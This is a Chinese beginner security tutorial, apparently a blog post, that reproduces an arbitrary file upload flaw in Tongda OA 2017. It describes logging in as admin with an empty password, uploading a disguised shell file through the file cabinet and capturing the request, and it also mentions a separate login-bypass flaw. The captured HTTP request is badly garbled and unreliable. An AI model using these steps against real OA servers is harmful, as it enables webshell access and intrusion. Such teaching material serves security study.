漏洞任意下载文件怎么下载_漏洞挖掘之通达OA2017任意文件上传_入门白帽子教程
关于通达OA:
通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户。
通达官网链接:
影响版本:
漏洞:用户可以通过上传任意文件到服务器中,并且可以借助上传的文件利用shell工具直接获得权限。主要是因为通达OA未对用户上传的文件进行校验,因为系统会对文件名最后的.忽略,最后导致了该上传漏洞。比如:1.php. 到了win上之后就会变成1.php
本地复现
下载.exe按照默认选项安装好之后目录如下:
2.本地按照默认80端口访问该OA:
3. 使用本地的默认账号admin和空密码进入:(实例的时候参考使用通达OA前台任意用户登录漏洞进入后台)
4. 选择:快捷菜单—>个人文件柜—>选择新建文件,开始新建文件
5. 选择本地上传图片:
6.上传脚本shell.jpg开始上传抓包,抓包数据如下:
POST ///。php?=utf-8 HTTP/1。1Host: -Agent: /5。0 ( NT 10。0; Win64; x64; rv:68。0) Gecko/ /68。: */*-: zh-CN,zh;q=0。8,zh-TW;q=0。7,zh-HK;q=0。5,en-US;q=0。3,en;q=0。-: gzip, ith: t-Type: /form-data; =---------------------------t-: : : : : =admin; =admin; SID_1=; =-----------------------------t-: form-data;-----------------------------t-: form-data;shell。
jpg-----------------------------t-: form-data;image/jpeg-----------------------------t-: form-data;2020/8/5 ä¸å11:35:58-----------------------------t-: form-data;650-----------------------------t-: form-data;; ="shell。jpg"-Type: image/jpeg
~
网络安全学习,我们一起交流
~